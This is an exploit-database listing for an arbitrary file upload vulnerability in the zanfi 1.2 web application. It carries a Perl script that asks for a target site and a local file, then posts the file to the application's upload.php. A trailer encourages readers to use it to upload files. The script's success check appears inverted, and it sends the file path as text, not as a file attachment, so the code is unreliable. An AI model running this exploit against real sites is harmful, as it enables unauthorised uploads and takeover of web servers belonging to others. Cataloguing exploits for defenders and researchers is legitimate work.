header-logo
Suggest Exploit
vendor:
zanfi 1.2
by:
Reptil
7.5
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: zanfi 1.2
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

zanfi 1.2 Arbitrary File Upload xpl

This exploit allows an attacker to upload arbitrary files to a vulnerable web application. The vulnerability exists in the zanfi 1.2 web application, which allows an attacker to upload a malicious file to the web server. The exploit is triggered when the attacker sends a POST request to the upload.php file with the malicious file as a parameter. If the request is successful, the malicious file will be uploaded to the web server.

Mitigation:

The best way to mitigate this vulnerability is to restrict the types of files that can be uploaded to the web server. Additionally, the web application should be configured to only allow certain file types to be uploaded.
Source

Exploit-DB raw data:

#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+zanfi 1.2 Arbitrary File Upload  xpl               +
+                                                   +
+Discovered by :reptil                              +
+                                                   +
+                                                   +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
# Reptil  
INTRO
print "Enter URL(ie: http://site.com): ";
    chomp(my $url=<STDIN>);
   
print "Enter File Path(path to local file to upload): ";
    chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/editor/filemanager/upload/php/upload.php',
                      Content_Type => 'form-data',
                      Content      => [ NewFile => $file ] );
if($re->is_success) {
    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
    else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;

##############################################################
##############################################################
*
*you can use this and upload files ! 
*
*http://www.site.com/editor/filemanager/upload/test.html
*
*http://www.zanfi.nl
##############################################################
##############################################################

# milw0rm.com [2008-09-10]

Navigation

Suggest Exploit

Services By CQR